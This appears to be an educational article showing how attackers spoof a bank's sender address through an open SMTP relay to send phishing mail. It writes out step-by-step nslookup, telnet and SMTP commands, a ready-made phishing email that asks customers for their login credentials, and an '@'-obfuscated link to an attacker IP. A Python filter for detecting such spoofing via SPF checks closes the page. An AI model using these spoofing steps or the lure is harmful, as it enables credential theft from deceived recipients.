SMTP Server-based Exploits - Phishing
The open nature of SMTP has been one of the main causes of the phishing threat growing to its current scale. Insecure SMTP servers that relay mail for domains they do not host can be used to preserve the attacker's anonymity toward the victim. This not only increases the victim's confidence in the phished email but also lets the attacker apply social engineering tricks in a more believable way.
One of the main reasons SMTP is among the weakest protocols in terms of security is that, at the time it was developed, the industry was not aware of issues such as spam, phishing and spoofing. By the time these issues were exposed it was too late: the protocol had gained immense popularity, and it remains one of the most widely used protocols.
One often wonders how an attacker is able to appear in control of a well-trusted domain such as citybank.com, suntrust.com or any other financial institution and send mail to consumers from legitimate-looking or illegitimate email IDs such as Customersupport@yourbank.com containing phished links.
Here is a practical demonstration of how an attacker achieves this in four easy steps:
Step 1
Find the list of mail servers for the targeted domain:
[root@root]# nslookup
> set querytype=mx
> Targetdomain.com
Server: 192.168.196.8(Dns IP)
Address: 192.168.196.8#53
Non-authoritative answer:
Targetdomain.com mail exchanger = 50 mail4.Targetdomain.com.com.
Targetdomain.com mail exchanger = 60 mail5.Targetdomain.com.com.
Targetdomain.com mail exchanger = 70 mail6.Targetdomain.com.com.
Targetdomain.com mail exchanger = 10 mail1.Targetdomain.com.com.
Targetdomain.com mail exchanger = 20 mail2.Targetdomain.com.com.
Targetdomain.com mail exchanger = 30 mail3.Targetdomain.com.com.
Authoritative answers can be found from:
mail.Targetdomain.com.com internet address = 21X.XXX.XX.X( Ip omitted )
Step 2
The attacker telnets to one of the listed mail servers on port 25:
[root@root]# telnet mail4.Targetdomain.com.com. 25
Trying xxx.xxx.x.x...( Ip omitted due to security issues)
Connected to mail4.Targetdomain.com.com. (xx.xxx.x.xx).
220 Mail server name SMTP qpsmtpd 0.28 ready; send us your mail, but not your spam.
Step 3
The attacker types the SMTP command "helo" and gets a valid response from the target:
helo""
250 Mail server name Hi Unknown [your IP displayed here]; I am so happy to meet you
Step 4
The attacker uses a set of formatted SMTP commands to send a legitimate-looking mail to the victim, the final step toward his goal:
MAIL FROM: customersupport@yourbank.com
RCPT TO: victim@yourbank.com
DATA
FROM:customersupport@yourbank.com
TO:victim@yourbank.com
Subject:important notice
Dear customer
Your Password is expired. Please Re authenticate using your old password and provide us your new login credentials. Kindly take this on priority basis.
Click http://yourbank.com/authenticate/@198.133.xx.xx:80 (attacker's IP address)
Thanks
Customers Support Department
Yourbank.com
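The receiving side of this exchange, as an added example that is not part of the original page: a Python mail-filter check that evaluates SPF for the envelope sender against the connecting IP, compares the envelope and header sender domains, and flags URLs that use '@' to make the text before it look like the host. The SPF record, the sample message and the addresses 203.0.113.0/24 and 198.51.100.7 are constructed for the example; a production check would fetch the domain's TXT record via DNS.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed SPF record (hypothetical; a real check reads the domain's TXT record).
SPF_RECORDS = {"yourbank.com": "v=spf1 ip4:203.0.113.0/24 -all"}
RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
URL_RE = re.compile(r"https?://\S+")

# Constructed message mirroring the one injected after DATA above.
SAMPLE_MESSAGE = (
    "From: customersupport@yourbank.com\nTo: victim@yourbank.com\n"
    "Subject: important notice\n\nYour Password is expired. Click "
    "http://yourbank.com/authenticate/@198.51.100.7:80 to re-authenticate.\n"
)

def spf_result(domain, client_ip):
    """Minimal SPF check: ip4/ip6 mechanisms plus 'all', evaluated in record order."""
    if domain not in SPF_RECORDS:
        return "none"
    ip = ipaddress.ip_address(client_ip)
    for term in SPF_RECORDS[domain].split()[1:]:   # skip the v=spf1 tag
        qualifier = "+"
        if term[0] in RESULT:
            qualifier, term = term[0], term[1:]
        if term == "all":
            return RESULT[qualifier]
        if term.startswith(("ip4:", "ip6:")) and ip in ipaddress.ip_network(term[4:], strict=False):
            return RESULT[qualifier]
    return "neutral"                                 # no mechanism matched

def deceptive_urls(text):
    # An '@' makes the text before it look like the host while the real host follows it.
    return [u for u in URL_RE.findall(text) if "@" in u]

def analyze(raw_message, envelope_from, client_ip):
    """Findings a receiving MTA or mail filter would raise for this delivery."""
    msg = message_from_string(raw_message)
    env_domain = envelope_from.rsplit("@", 1)[-1].lower()
    hdr_domain = parseaddr(msg["From"])[1].rsplit("@", 1)[-1].lower()
    findings = []
    if env_domain != hdr_domain:
        findings.append("envelope/header sender domain mismatch")
    spf = spf_result(env_domain, client_ip)
    if spf in ("fail", "softfail"):
        findings.append(f"spf {spf} for {env_domain} from {client_ip}")
    if deceptive_urls(msg.get_payload()):
        findings.append("url with '@' in body")
    return findings
```

Because the attacker's MAIL FROM matches the header From, the domain comparison alone is silent; the SPF failure for the unauthorized connecting IP is what exposes the spoof.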